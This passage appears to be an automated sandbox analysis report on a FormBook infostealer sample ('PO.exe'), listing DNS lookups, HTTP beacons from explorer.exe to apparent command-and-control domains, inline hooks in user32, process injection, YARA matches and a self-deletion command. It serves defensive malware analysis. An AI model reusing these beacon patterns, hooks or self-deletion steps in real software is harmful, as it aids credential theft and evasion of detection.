                                      Apr 8, 2021 12:09:52.035056114 CEST8.8.8.8192.168.2.50x5d97Name error (3)www.cwyxonlp.icunonenoneA (IP address)IN (0x0001)
                                      Apr 8, 2021 12:10:12.307060003 CEST8.8.8.8192.168.2.50x1No error (0)www.websiteworlda-z.com194.117.254.63A (IP address)IN (0x0001)
                                      Apr 8, 2021 12:10:32.767242908 CEST8.8.8.8192.168.2.50xb793No error (0)www.phorice.compixie.porkbun.comCNAME (Canonical name)IN (0x0001)
                                      Apr 8, 2021 12:10:32.767242908 CEST8.8.8.8192.168.2.50xb793No error (0)pixie.porkbun.com44.227.76.166A (IP address)IN (0x0001)

                                      HTTP Request Dependency Graph

                                      • www.websiteworlda-z.com
                                      • www.phorice.com

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      0192.168.2.549693194.117.254.6380C:\Windows\explorer.exe
                                      TimestampkBytes transferredDirectionData
                                      Apr 8, 2021 12:10:12.333529949 CEST332OUTGET /r4ei/?_ZA0p2=cRhAr0dy1lG+6v8jj0sxWagS9ZGCZip2Fr4SFXT7OXMmHzjmweO35OAl28FoqWQGc0rZ&GzuLH=VBZLTBc0f HTTP/1.1
                                      Host: www.websiteworlda-z.com
                                      Connection: close
                                      Data Raw: 00 00 00 00 00 00 00
                                      Data Ascii:
                                      Apr 8, 2021 12:10:12.351783037 CEST333INHTTP/1.1 404 Not Found
                                      Date: Thu, 08 Apr 2021 10:10:12 GMT
                                      Server: Apache
                                      Content-Length: 269
                                      Connection: close
                                      Content-Type: text/html; charset=iso-8859-1
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 77 65 62 73 69 74 65 77 6f 72 6c 64 61 2d 7a 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.websiteworlda-z.com Port 80</address></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      1192.168.2.54969444.227.76.16680C:\Windows\explorer.exe
                                      TimestampkBytes transferredDirectionData
                                      Apr 8, 2021 12:10:33.100172997 CEST334OUTGET /r4ei/?_ZA0p2=qFx0jq35EoqhqGMmxZfRcaIhnrtQSZTAjbNVWKcVQ7fc4zdL4G4zojbsIieSdo+D23N6&GzuLH=VBZLTBc0f HTTP/1.1
                                      Host: www.phorice.com
                                      Connection: close
                                      Data Raw: 00 00 00 00 00 00 00
                                      Data Ascii:
                                      Apr 8, 2021 12:10:33.269149065 CEST335INHTTP/1.1 307 Temporary Redirect
                                      Server: openresty
                                      Date: Thu, 08 Apr 2021 10:10:33 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Content-Length: 168
                                      Connection: close
                                      Location: http://phorice.com
                                      X-Frame-Options: sameorigin
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>307 Temporary Redirect</title></head><body><center><h1>307 Temporary Redirect</h1></center><hr><center>openresty</center></body></html>


                                      Code Manipulations

                                      User Modules

                                      Hook Summary

                                      Function NameHook TypeActive in Processes
                                      PeekMessageAINLINEexplorer.exe
                                      PeekMessageWINLINEexplorer.exe
                                      GetMessageWINLINEexplorer.exe
                                      GetMessageAINLINEexplorer.exe

                                      Processes

                                      Process: explorer.exe, Module: user32.dll
                                      Function NameHook TypeNew Data
                                      PeekMessageAINLINE0x48 0x8B 0xB8 0x80 0x0E 0xEB
                                      PeekMessageWINLINE0x48 0x8B 0xB8 0x88 0x8E 0xEB
                                      GetMessageWINLINE0x48 0x8B 0xB8 0x88 0x8E 0xEB
                                      GetMessageAINLINE0x48 0x8B 0xB8 0x80 0x0E 0xEB

                                      Statistics

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      Analysis Process: PO.exe PID: 5584 Parent PID: 5616

                                      General

                                      Start time:12:08:28
                                      Start date:08/04/2021
                                      Path:C:\Users\user\Desktop\PO.exe
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Users\user\Desktop\PO.exe'
                                      Imagebase:0x400000
                                      File size:228037 bytes
                                      MD5 hash:665CB19601850467AF3EE7D9FD0E0350
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.242379104.0000000002670000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.242379104.0000000002670000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.242379104.0000000002670000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:low

                                      Analysis Process: PO.exe PID: 5536 Parent PID: 5584

                                      General

                                      Start time:12:08:29
                                      Start date:08/04/2021
                                      Path:C:\Users\user\Desktop\PO.exe
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Users\user\Desktop\PO.exe'
                                      Imagebase:0x400000
                                      File size:228037 bytes
                                      MD5 hash:665CB19601850467AF3EE7D9FD0E0350
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.293202588.00000000006C0000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.293202588.00000000006C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.293202588.00000000006C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.293226365.00000000006F0000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.293226365.00000000006F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.293226365.00000000006F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.238704374.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.238704374.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.238704374.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:low

                                      Analysis Process: explorer.exe PID: 3472 Parent PID: 5536

                                      General

                                      Start time:12:08:35
                                      Start date:08/04/2021
                                      Path:C:\Windows\explorer.exe
                                      Wow64 process (32bit):false
                                      Commandline:
                                      Imagebase:0x7ff693d90000
                                      File size:3933184 bytes
                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Analysis Process: explorer.exe PID: 3980 Parent PID: 3472

                                      General

                                      Start time:12:08:55
                                      Start date:08/04/2021
                                      Path:C:\Windows\SysWOW64\explorer.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                      Imagebase:0x900000
                                      File size:3611360 bytes
                                      MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.501170602.0000000004900000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.501170602.0000000004900000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.501170602.0000000004900000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.501014496.00000000048D0000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.501014496.00000000048D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.501014496.00000000048D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:high

                                      Analysis Process: cmd.exe PID: 1320 Parent PID: 3980

                                      General

                                      Start time:12:08:58
                                      Start date:08/04/2021
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:/c del 'C:\Users\user\Desktop\PO.exe'
                                      Imagebase:0x1010000
                                      File size:232960 bytes
                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Analysis Process: conhost.exe PID: 4492 Parent PID: 1320

                                      General

                                      Start time:12:08:59
                                      Start date:08/04/2021
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7ecfc0000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Disassembly

                                      Code Analysis

                                      Reset < >